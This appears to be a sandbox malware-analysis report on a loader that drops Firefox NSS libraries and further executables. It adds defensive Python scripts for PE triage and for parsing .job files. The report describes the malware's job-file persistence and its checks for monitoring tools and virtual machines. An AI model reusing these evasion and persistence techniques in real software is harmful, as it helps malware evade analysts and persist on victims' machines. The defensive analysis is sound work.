Source: Binary string: mozglue.pdbP source: Rnteb46TuM.exe, 00000000.00000002.2331152818.000000006C80D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: Rnteb46TuM.exe, 00000000.00000002.2331455452.000000006C9CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: Rnteb46TuM.exe, 00000000.00000002.2331152818.000000006C80D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Source: C:\Users\user\Desktop\Rnteb46TuM.exe Unpacked PE file: 0.2.Rnteb46TuM.exe.500000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Unpacked PE file: 8.2.AFBFHDBKJE.exe.f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wcjrprme:EW;aczpyjwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wcjrprme:EW;aczpyjwy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 10.2.explorti.exe.f10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wcjrprme:EW;aczpyjwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wcjrprme:EW;aczpyjwy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 11.2.explorti.exe.f10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wcjrprme:EW;aczpyjwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wcjrprme:EW;aczpyjwy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Unpacked PE file: 12.2.6e6e496542.exe.410000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 15.2.explorti.exe.f10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wcjrprme:EW;aczpyjwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wcjrprme:EW;aczpyjwy:EW;.taggant:EW;
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7FC410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C7FC410
Source: initial sample Static PE information: section where entry point is pointing to: .data
Source: random[1].exe.10.dr Static PE information: real checksum: 0x0 should be: 0x272832
Source: Rnteb46TuM.exe Static PE information: real checksum: 0x0 should be: 0x27164b
Source: explorti.exe.8.dr Static PE information: real checksum: 0x1d2111 should be: 0x1d86f0
Source: 6e6e496542.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x272832
Source: AFBFHDBKJE.exe.0.dr Static PE information: real checksum: 0x1d2111 should be: 0x1d86f0
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1d2111 should be: 0x1d86f0
Source: Rnteb46TuM.exe Static PE information: section name:
Source: Rnteb46TuM.exe Static PE information: section name:
Source: Rnteb46TuM.exe Static PE information: section name:
Source: Rnteb46TuM.exe Static PE information: section name:
Source: Rnteb46TuM.exe Static PE information: section name:
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name:
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name: .idata
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name:
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name: wcjrprme
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name: aczpyjwy
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name: .taggant
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: wcjrprme
Source: amadka[1].exe.0.dr Static PE information: section name: aczpyjwy
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: explorti.exe.8.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name: .idata
Source: explorti.exe.8.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name: wcjrprme
Source: explorti.exe.8.dr Static PE information: section name: aczpyjwy
Source: explorti.exe.8.dr Static PE information: section name: .taggant
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7CB536 push ecx; ret 0_2_6C7CB549
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F2D82C push ecx; ret 10_2_00F2D83F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2A70 push 7F7A0002h; ret 12_2_7F7A2A7F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1E70 push 7F7A0002h; ret 12_2_7F7A1E7F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1B70 push 7F7A0002h; ret 12_2_7F7A1B7F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A0F70 push 7F7A0002h; ret 12_2_7F7A0F7F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1270 push 7F7A0002h; ret 12_2_7F7A127F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1570 push 7F7A0002h; ret 12_2_7F7A157F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1870 push 7F7A0002h; ret 12_2_7F7A187F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2170 push 7F7A0002h; ret 12_2_7F7A217F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2470 push 7F7A0002h; ret 12_2_7F7A247F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2770 push 7F7A0002h; ret 12_2_7F7A277F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2B60 push 7F7A0002h; ret 12_2_7F7A2B6F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2860 push 7F7A0002h; ret 12_2_7F7A286F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1C60 push 7F7A0002h; ret 12_2_7F7A1C6F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A0D60 push 7F7A0002h; ret 12_2_7F7A0D6F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1060 push 7F7A0002h; ret 12_2_7F7A106F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1360 push 7F7A0002h; ret 12_2_7F7A136F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1660 push 7F7A0002h; ret 12_2_7F7A166F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1960 push 7F7A0002h; ret 12_2_7F7A196F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1F60 push 7F7A0002h; ret 12_2_7F7A1F6F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2260 push 7F7A0002h; ret 12_2_7F7A226F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2560 push 7F7A0002h; ret 12_2_7F7A256F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2C50 push 7F7A0002h; ret 12_2_7F7A2C5F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A2950 push 7F7A0002h; ret 12_2_7F7A295F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1D50 push 7F7A0002h; ret 12_2_7F7A1D5F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A0E50 push 7F7A0002h; ret 12_2_7F7A0E5F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1150 push 7F7A0002h; ret 12_2_7F7A115F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1450 push 7F7A0002h; ret 12_2_7F7A145F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1750 push 7F7A0002h; ret 12_2_7F7A175F
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1A50 push 7F7A0002h; ret 12_2_7F7A1A5F
Source: Rnteb46TuM.exe Static PE information: section name: entropy: 7.9949641655914805
Source: Rnteb46TuM.exe Static PE information: section name: entropy: 7.980309777125587
Source: Rnteb46TuM.exe Static PE information: section name: entropy: 7.952939990721896
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name: entropy: 7.981967359811176
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name: wcjrprme entropy: 7.953701323474707
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.981967359811176
Source: amadka[1].exe.0.dr Static PE information: section name: wcjrprme entropy: 7.953701323474707
Source: explorti.exe.8.dr Static PE information: section name: entropy: 7.981967359811176
Source: explorti.exe.8.dr Static PE information: section name: wcjrprme entropy: 7.953701323474707
Source: random[1].exe.10.dr Static PE information: section name: entropy: 7.994663485275653
Source: random[1].exe.10.dr Static PE information: section name: entropy: 7.978967197470916
Source: random[1].exe.10.dr Static PE information: section name: entropy: 7.953780146204382
Source: 6e6e496542.exe.10.dr Static PE information: section name: entropy: 7.994663485275653
Source: 6e6e496542.exe.10.dr Static PE information: section name: entropy: 7.978967197470916
Source: 6e6e496542.exe.10.dr Static PE information: section name: entropy: 7.953780146204382
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File created: C:\ProgramData\softokn3.dll
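The checksum mismatches, the nameless and near-8.0-entropy sections, and the entry point sitting in .data reported above for Rnteb46TuM.exe and the dropped executables are all static properties that can be re-checked offline without the sandbox. The Python script below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the sample. It recomputes OptionalHeader.CheckSum with the ImageHlp algorithm, measures per-section Shannon entropy, flags nameless, non-printable-named and writable+executable sections, and names the section that contains the entry point. It runs on a constructed two-section PE32 built by build_sample_pe(), not on the real sample; the 7.0 entropy threshold is an assumption of the example, not a value from the report.

```python
import math
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
HIGH_ENTROPY = 7.0  # rule-of-thumb packed/encrypted threshold; an assumption of this example


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """OptionalHeader.CheckSum as ImageHlp's CheckSumMappedFile computes it: fold every DWORD
    of the file except the CheckSum field into 16 bits, then add the file length."""
    padded = data + b"\x00" * ((4 - len(data) % 4) % 4)
    skip = checksum_offset // 4
    total = 0
    for i in range(len(padded) // 4):
        if i == skip:
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    return -sum((c / len(buf)) * math.log2(c / len(buf)) for c in counts if c)


def triage_pe(data: bytes) -> dict:
    """Static checks mirroring the report's 'Static PE information' findings.
    The offsets used (entry point +0x10, CheckSum +0x40) are the same for PE32 and PE32+."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE image")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    size_of_opt = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24                                    # IMAGE_OPTIONAL_HEADER
    entry_rva = struct.unpack_from("<I", data, opt + 0x10)[0]
    stored = struct.unpack_from("<I", data, opt + 0x40)[0]
    computed = pe_checksum(data, opt + 0x40)
    sections, entry_section = [], None
    for i in range(num_sections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + size_of_opt + 40 * i)   # IMAGE_SECTION_HEADER
        raw_name = name.rstrip(b"\x00")
        ent = shannon_entropy(data[raw_ptr:raw_ptr + raw_size])
        sec = {"name": raw_name.decode("ascii", "replace"),
               "nameless": raw_name == b"",
               "special_chars": any(c < 0x20 or c > 0x7E for c in raw_name),
               "entropy": round(ent, 4), "high_entropy": ent > HIGH_ENTROPY,
               "rwx": (chars & (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE))
                      == (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE)}
        if va <= entry_rva < va + max(vsize, raw_size):
            entry_section = sec["name"]
        sections.append(sec)
    return {"checksum_stored": stored, "checksum_computed": computed,
            "checksum_mismatch": stored != computed,
            "entry_point_section": entry_section, "sections": sections}


def build_sample_pe() -> bytes:
    """Constructed two-section PE32 for the demo (not Rnteb46TuM.exe): a nameless RWX section
    of maximal entropy, then a .data section that holds the entry point; CheckSum left at 0."""
    dos = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x0102)     # i386, 2 sections
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)                                # PE32 magic
    struct.pack_into("<I", opt, 0x10, 0x2010)                               # AddressOfEntryPoint -> .data
    struct.pack_into("<I", opt, 0x1C, 0x400000)                             # ImageBase
    struct.pack_into("<II", opt, 0x20, 0x1000, 0x200)                       # Section/File alignment
    packed = bytes(range(256)) * 4                                          # 1024 bytes, every value 4x
    data_blob = b"\x00" * 0x200
    sec0 = struct.pack("<8sIIIIIIHHI", b"", 0x400, 0x1000, len(packed), 0x200, 0, 0, 0, 0,
                       IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
    sec1 = struct.pack("<8sIIIIIIHHI", b".data", 0x200, 0x2000, len(data_blob), 0x600, 0, 0, 0, 0,
                       0x40 | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)   # 0x40 = INITIALIZED_DATA
    headers = dos + b"PE\x00\x00" + file_hdr + bytes(opt) + sec0 + sec1
    return headers + b"\x00" * (0x200 - len(headers)) + packed + data_blob


if __name__ == "__main__":
    import json
    print(json.dumps(triage_pe(build_sample_pe()), indent=2))
```

To triage a real dropped file, pass its bytes to triage_pe(); a stored checksum of 0, as on Rnteb46TuM.exe and the two random[1].exe/6e6e496542.exe drops, simply means the linker or packer never filled the field, while a non-zero mismatch as on explorti.exe means the file was modified after the checksum was written.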

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7F55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C7F55F0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX
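The file AFBFHDBKJE.exe creates at C:\Windows\Tasks\explorti.job is a Task Scheduler 1.0 job, the legacy binary format the at/schtasks v1 interface still honours, and it is the artifact that re-launches the dropped explorti.exe. During incident response the question is what the job runs and how often, which the Task Scheduler UI will not show for a .job that was written directly to disk. The Python parser below is an added example written for this page, not part of the report: it decodes the MS-TSCH .job layout (68-byte FIXDLEN_DATA, length-prefixed UTF-16 strings, 48-byte trigger records) and applies two triage heuristics. The blob it parses is constructed by build_sample_job() and only borrows the explorti.exe path from the report; its trigger type, start date, author and one-minute interval are assumptions of the example, not values recovered from the real explorti.job.

```python
import struct
import uuid

TRIGGER_TYPES = {0: "ONCE", 1: "DAILY", 2: "WEEKLY", 3: "MONTHLYDATE", 4: "MONTHLYDOW",
                 5: "ON_IDLE", 6: "AT_SYSTEMSTART", 7: "AT_LOGON"}
FIXDLEN_FMT = "<HH16sHHHHHHIIIII"   # first 52 bytes of FIXDLEN_DATA; the 16-byte Last Run Time follows
TRIGGER_FMT = "<HHHHHHHHHHIIII"     # first 36 bytes of a 48-byte trigger record


def _read_jobstr(buf: bytes, off: int):
    """Variable-section string: 2-byte character count (terminating NUL included), then UTF-16LE."""
    n = struct.unpack_from("<H", buf, off)[0]
    off += 2
    if n == 0:
        return "", off
    return buf[off:off + 2 * n].decode("utf-16-le").rstrip("\x00"), off + 2 * n


def parse_job(buf: bytes) -> dict:
    """Pull the fields an incident responder wants out of a Task Scheduler 1.0 .job file."""
    fixed = struct.unpack_from(FIXDLEN_FMT, buf, 0)
    guid, app_off, trig_off, flags = fixed[2], fixed[3], fixed[4], fixed[13]
    off = app_off                    # App Name Len Offset skips FIXDLEN_DATA and Running Instance Count
    app, off = _read_jobstr(buf, off)
    params, off = _read_jobstr(buf, off)
    workdir, off = _read_jobstr(buf, off)
    author, off = _read_jobstr(buf, off)
    comment, off = _read_jobstr(buf, off)
    triggers = []
    for i in range(struct.unpack_from("<H", buf, trig_off)[0]):
        t = struct.unpack_from(TRIGGER_FMT, buf, trig_off + 2 + 48 * i)
        _size, _r1, by, bm, bd, _ey, _em, _ed, sh, smin, duration, interval, _tflags, ttype = t
        triggers.append({"type": TRIGGER_TYPES.get(ttype, "UNKNOWN(%d)" % ttype),
                         "begin": "%04d-%02d-%02d %02d:%02d" % (by, bm, bd, sh, smin),
                         "duration_min": duration, "interval_min": interval})
    return {"uuid": str(uuid.UUID(bytes_le=guid)), "application": app, "parameters": params,
            "working_dir": workdir, "author": author, "comment": comment,
            "flags": flags, "triggers": triggers}


def triage_job(job: dict) -> list:
    """Cheap IR heuristics: a user-writable launch path and a tight re-run interval are what a
    loader's persistence task looks like; neither proves anything on its own."""
    reasons = []
    low = job["application"].lower()
    if "\\appdata\\local\\temp\\" in low or "\\programdata\\" in low:
        reasons.append("application lives in a user-writable staging directory")
    for t in job["triggers"]:
        if t["interval_min"] and t["interval_min"] <= 5:
            reasons.append("%s trigger re-runs every %d min" % (t["type"], t["interval_min"]))
    return reasons


def _jobstr(s: str) -> bytes:
    return struct.pack("<H", 0) if not s else struct.pack("<H", len(s) + 1) + (s + "\x00").encode("utf-16-le")


def build_sample_job() -> bytes:
    """Constructed .job blob for the demo (NOT the real explorti.job): DAILY trigger that re-runs a
    Temp-resident executable every minute for 24 hours."""
    var = struct.pack("<H", 0)                                              # Running Instance Count
    var += _jobstr(r"C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe")  # Application Name
    var += _jobstr("")                                                      # Parameters
    var += _jobstr(r"C:\Users\user\AppData\Local\Temp\ad40971b6b")          # Working Directory
    var += _jobstr("user")                                                  # Author
    var += _jobstr("")                                                      # Comment
    var += struct.pack("<HH", 0, 0)                                         # User Data, Reserved Data
    trig_off = 68 + len(var)
    trigger = struct.pack(TRIGGER_FMT, 48, 0, 2024, 6, 30, 0, 0, 0, 12, 0, 1440, 1, 0, 1) + b"\x00" * 12
    var += struct.pack("<H", 1) + trigger                                   # Trigger Count + one trigger
    fixed = struct.pack(FIXDLEN_FMT, 0x0500, 1, uuid.UUID("12345678-1234-5678-1234-567812345678").bytes_le,
                        70, trig_off, 0, 0, 0, 0, 0x20, 72 * 3600 * 1000, 0, 0, 0) + b"\x00" * 16
    return fixed + var


if __name__ == "__main__":
    import json
    job = parse_job(build_sample_job())
    print(json.dumps(job, indent=2))
    print(triage_job(job))
```

On a live host the same call works on the real artifact: parse_job(open(r"C:\Windows\Tasks\explorti.job", "rb").read()). Pair it with the file's creation timestamp, since a .job dropped by a process rather than registered through the scheduler service will have no matching entry under the Task Scheduler event log.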

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
